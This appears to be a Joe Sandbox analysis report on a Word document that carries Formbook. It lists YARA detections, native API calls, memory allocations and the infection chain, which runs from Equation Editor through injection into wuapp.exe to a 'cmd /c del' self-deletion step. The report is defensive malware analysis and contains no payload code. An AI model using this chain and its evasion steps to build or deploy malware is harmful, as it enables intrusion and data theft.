          Source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\AppData\Roaming\word.exe Code function: 4_2_004032FA EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F7351F8_2_01F7351F
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F814898_2_01F81489
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01FA54858_2_01FA5485
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01FA57C38_2_01FA57C3
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F7C7BC8_2_01F7C7BC
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01FF579A8_2_01FF579A
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F7E6C18_2_01F7E6C1
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F746808_2_01F74680
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F869FE8_2_01F869FE
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F729B28_2_01F729B2
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_02023A838_2_02023A83
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01FF59558_2_01FF5955
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F9286D8_2_01F9286D
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_0201CBA48_2_0201CBA4
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F7C85C8_2_01F7C85C
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01FFDBDA8_2_01FFDBDA
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_0200F8EE8_2_0200F8EE
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F97B008_2_01F97B00
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_0201098E8_2_0201098E
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F7CD5B8_2_01F7CD5B
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01FA0D3B8_2_01FA0D3B
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F9DF7C8_2_01F9DF7C
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F80F3F8_2_01F80F3F
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F8EE4C8_2_01F8EE4C
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01FA2E2F8_2_01FA2E2F
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_0200FDDD8_2_0200FDDD
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AE79A8_2_000AE79A
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AD7DE8_2_000AD7DE
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AEB718_2_000AEB71
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_00092D908_2_00092D90
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_00099E4B8_2_00099E4B
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_00099E508_2_00099E50
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AEEB58_2_000AEEB5
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_00092FB08_2_00092FB0
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: String function: 009B2233 appears 42 times
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: String function: 00A0DF5C appears 51 times
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: String function: 00A53F92 appears 51 times
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: String function: 00A5373B appears 87 times
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: String function: 009AF1E0 appears 48 times
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: String function: 01FDF970 appears 81 times
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: String function: 01F6DF5C appears 107 times
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: String function: 01F6E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: String function: 01FB373B appears 238 times
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: String function: 01FB3F92 appears 108 times
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041A350 NtCreateFile,6_2_0041A350
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041A400 NtReadFile,6_2_0041A400
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041A480 NtClose,6_2_0041A480
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041A530 NtAllocateVirtualMemory,6_2_0041A530
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041A34A NtCreateFile,6_2_0041A34A
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041A3FB NtReadFile,6_2_0041A3FB
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041A47B NtClose,6_2_0041A47B
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A000C4 NtCreateFile,LdrInitializeThunk,6_2_00A000C4
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A00078 NtResumeThread,LdrInitializeThunk,6_2_00A00078
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A00048 NtProtectVirtualMemory,LdrInitializeThunk,6_2_00A00048
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009FF9F0 NtClose,LdrInitializeThunk,6_2_009FF9F0
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009FF900 NtReadFile,LdrInitializeThunk,6_2_009FF900
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009FFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_009FFAD0
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009FFAE8 NtQueryInformationProcess,LdrInitializeThunk,6_2_009FFAE8
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009FFBB8 NtQueryInformationToken,LdrInitializeThunk,6_2_009FFBB8
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009FFB68 NtFreeVirtualMemory,LdrInitializeThunk,6_2_009FFB68
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009FFC90 NtUnmapViewOfSection,LdrInitializeThunk,6_2_009FFC90
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009FFC60 NtMapViewOfSection,LdrInitializeThunk,6_2_009FFC60
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009FFD8C NtDelayExecution,LdrInitializeThunk,6_2_009FFD8C
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009FFDC0 NtQuerySystemInformation,LdrInitializeThunk,6_2_009FFDC0
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009FFEA0 NtReadVirtualMemory,LdrInitializeThunk,6_2_009FFEA0
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009FFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_009FFED0
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009FFFB4 NtCreateSection,LdrInitializeThunk,6_2_009FFFB4
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A010D0 NtOpenProcessToken,6_2_00A010D0
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A00060 NtQuerySection,6_2_00A00060
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A001D4 NtSetValueKey,6_2_00A001D4
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A0010C NtOpenDirectoryObject,6_2_00A0010C
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A01148 NtOpenThread,6_2_00A01148
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F600C4 NtCreateFile,LdrInitializeThunk,8_2_01F600C4
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F607AC NtCreateMutant,LdrInitializeThunk,8_2_01F607AC
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5F9F0 NtClose,LdrInitializeThunk,8_2_01F5F9F0
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5F900 NtReadFile,LdrInitializeThunk,8_2_01F5F900
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FBB8 NtQueryInformationToken,LdrInitializeThunk,8_2_01F5FBB8
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FB68 NtFreeVirtualMemory,LdrInitializeThunk,8_2_01F5FB68
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FB50 NtCreateKey,LdrInitializeThunk,8_2_01F5FB50
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FAE8 NtQueryInformationProcess,LdrInitializeThunk,8_2_01F5FAE8
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_01F5FAD0
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FAB8 NtQueryValueKey,LdrInitializeThunk,8_2_01F5FAB8
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FDC0 NtQuerySystemInformation,LdrInitializeThunk,8_2_01F5FDC0
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FD8C NtDelayExecution,LdrInitializeThunk,8_2_01F5FD8C
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FC60 NtMapViewOfSection,LdrInitializeThunk,8_2_01F5FC60
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FFB4 NtCreateSection,LdrInitializeThunk,8_2_01F5FFB4
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_01F5FED0
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F601D4 NtSetValueKey,8_2_01F601D4
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F61148 NtOpenThread,8_2_01F61148
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F6010C NtOpenDirectoryObject,8_2_01F6010C
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F610D0 NtOpenProcessToken,8_2_01F610D0
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F60078 NtResumeThread,8_2_01F60078
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F60060 NtQuerySection,8_2_01F60060
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F60048 NtProtectVirtualMemory,8_2_01F60048
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F61930 NtSetContextThread,8_2_01F61930
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5F938 NtWriteFile,8_2_01F5F938
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5F8CC NtWaitForSingleObject,8_2_01F5F8CC
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FBE8 NtQueryVirtualMemory,8_2_01F5FBE8
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FA50 NtEnumerateValueKey,8_2_01F5FA50
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FA20 NtQueryInformationFile,8_2_01F5FA20
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F61D80 NtSuspendThread,8_2_01F61D80
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FD5C NtEnumerateKey,8_2_01F5FD5C
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FC90 NtUnmapViewOfSection,8_2_01F5FC90
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F60C40 NtGetContextThread,8_2_01F60C40
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FC48 NtSetInformationFile,8_2_01F5FC48
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FC30 NtOpenProcess,8_2_01F5FC30
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FFFC NtCreateProcessEx,8_2_01F5FFFC
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FF34 NtQueueApcThread,8_2_01F5FF34
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FEA0 NtReadVirtualMemory,8_2_01F5FEA0
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F5FE24 NtWriteVirtualMemory,8_2_01F5FE24
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AA350 NtCreateFile,8_2_000AA350
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AA400 NtReadFile,8_2_000AA400
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AA480 NtClose,8_2_000AA480
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AA530 NtAllocateVirtualMemory,8_2_000AA530
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AA34A NtCreateFile,8_2_000AA34A
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AA3FB NtReadFile,8_2_000AA3FB
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_000AA47B NtClose,8_2_000AA47B
          Source: ~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe 78C9548A33ABD68ED553BB2A48166AFD21041B9D868A0373E4A11B93409DB049
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\wuapp.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\wuapp.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: Revised RFQ-PO180911.doc - Virustotal: Detection: 31%
          Source: Revised RFQ-PO180911.doc - ReversingLabs: Detection: 32%
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
          Source: C:\Users\user\AppData\Roaming\word.exeProcess created: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeProcess created: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wuapp.exe C:\Windows\SysWOW64\wuapp.exe
          Source: C:\Windows\SysWOW64\wuapp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\dvukljmnr.exe"
          Source: C:\Users\user\AppData\Roaming\word.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$vised RFQ-PO180911.docJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR6029.tmpJump to behavior
          Source: classification engine - Classification label: mal100.troj.expl.evad.winDOC@11/14@5/3
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_00402078 CoCreateInstance,MultiByteToWideChar,4_2_00402078
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_00404333 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,4_2_00404333
          Source: explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: .VBPud<_
          Source: ~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp.0.drOLE document summary: title field not present or empty
          Source: ~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp.0.drOLE document summary: author field not present or empty
          Source: ~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp.0.drOLE document summary: edited time not present or 0
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
